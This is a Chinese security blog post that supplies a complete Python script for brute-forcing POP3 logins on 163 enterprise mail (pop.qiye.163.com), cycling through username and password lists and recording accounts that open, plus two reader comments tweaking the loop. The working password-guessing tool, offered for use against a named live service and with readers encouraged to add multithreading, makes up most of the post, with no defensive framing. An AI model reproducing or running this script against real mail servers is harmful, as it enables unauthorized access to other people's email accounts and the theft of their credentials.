首页 > 安全工具 > 企业邮箱爆破小脚本(Python版)
2015
05-25

企业邮箱爆破小脚本(Python版)

之前发了一个帖子: 
http://zone.wooyun.org/content/20379 
总结了几种企业邮箱爆破的一些小技巧,直接贴出具体的爆破脚本吧。以163企业邮箱为例,目前这个是单线程的,也是从网上找到的爆破google邮箱的代码简单修改成的,只支持pop3协议。小伙伴们可以修改成支持多种协议、多线程的,坐等。贴上代码:

#!usr/bin/python 
#Email Pop3 Brute Forcer 
#http://www.darkc0de.com 
#d3hydr8[at]gmail[dot]com 
#http://www.nxadmin.com 

import threading, time, random, sys, poplib 
from copy import copy 

if len(sys.argv) !=3: 
  print "\n\t   EmailPopBruteForcer v1.0" 
  print "\t   --------------------------------------------------\n" 
  print "\t    Usage: ./qmailpopbrute.py <userlist> <wordlist>\n" 
  sys.exit(1) 
   
server = "pop.qiye.163.com" 
success = [] 

try: 
    users = open(sys.argv[1], "r").readlines() 
except(IOError): 
    print "[-] Error: Check your userlist path\n" 
    sys.exit(1) 
   
try: 
    words = open(sys.argv[2], "r").readlines() 
except(IOError): 
    print "[-] Error: Check your wordlist path\n" 
    sys.exit(1) 
   
try: 
  pop = poplib.POP3(server,110) 
  welcome = pop.getwelcome() 
  print welcome 
  pop.quit() 
except (poplib.error_proto): 
  welcome = "No Response" 
  pass 

def mailbruteforce(listuser,listpwd): 
  if len(listuser) < 1 or len(listpwd) < 1 : 
    print "An error occurred: No user or pass list" 
    return 1 
  for user in listuser: 
    for value in listpwd : 
      user = user.replace("\n","") 
      value = value.replace("\n","") 
       
      try: 
        print "-"*12 
         
        print "[+] User:",user,"Password:",value 
        time.sleep(2) 
        pop = poplib.POP3(server,110) 
        pop.user(user) 
        auth = pop.pass_(value) 
        print auth 
        if auth.split(' ')[0]!= "+OK" : 
          pop.quit() 
          print "unknown error !" 
          continue 
        if pop.stat()[1] is None or pop.stat()[1] < 1 : 
          pop.quit() 
          print "unknown error !" 
          continue 
        #print "\t\t\n\nLogin successful:",user, value 
        #print "\t\tMail:",pop.stat()[0],"emails" 
        #print "\t\tSize:",pop.stat()[1],"bytes\n\n" 
        ret = (user,value,pop.stat()[0],pop.stat()[1]) 
        success.append(ret) 
        #print len(success) 
        pop.quit() 
        break 
      except: 
        #print "An error occurred:", msg 
        pass 



print "\n\t EmailPopBruteForcer v1.0" 
print "\t   --------------------------------------------------\n" 
print "[+] Server:",server 
print "[+] Port: 995" 
print "[+] Users Loaded:",len(users) 
print "[+] Words Loaded:",len(words) 
print "[+] Server response:",welcome,"\n" 
mailbruteforce(users,words) 

print "\t[+] have weakpass :\t",len(success) 
if len(success) >=1: 
  for ret in success: 
    print "\n\n[+] Login successful:",ret[0], ret[1] 
    print "\t[+] Mail:",ret[2],"emails" 
    print "\t[+] Size:",ret[3],"bytes\n" 
print "\n[-] Done"

如图:

企业邮箱爆破小脚本(Python版) - 第1张  | 阿德马Web安全

 

 

 

 

 

 

 

 

 

 

 

 

 

 

最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。

企业邮箱爆破小脚本(Python版)》有 2 条评论

  1. 您好 说:

    要用到burp第三种破解要怎么该您的脚本

  2. 您好 说:

    已经解决了,呵呵 不会编程见笑了大牛..

    def mailbruteforce(listuser,listpwd):
    if len(listuser) < 1 or len(listpwd) < 1 :
    print "An error occurred: No user or pass list"
    return 1
    for user in listuser:
    user = user.replace("\n","")
    for value in listpwd :
    value = value.replace("\n","")

留下一个回复

你的email不会被公开。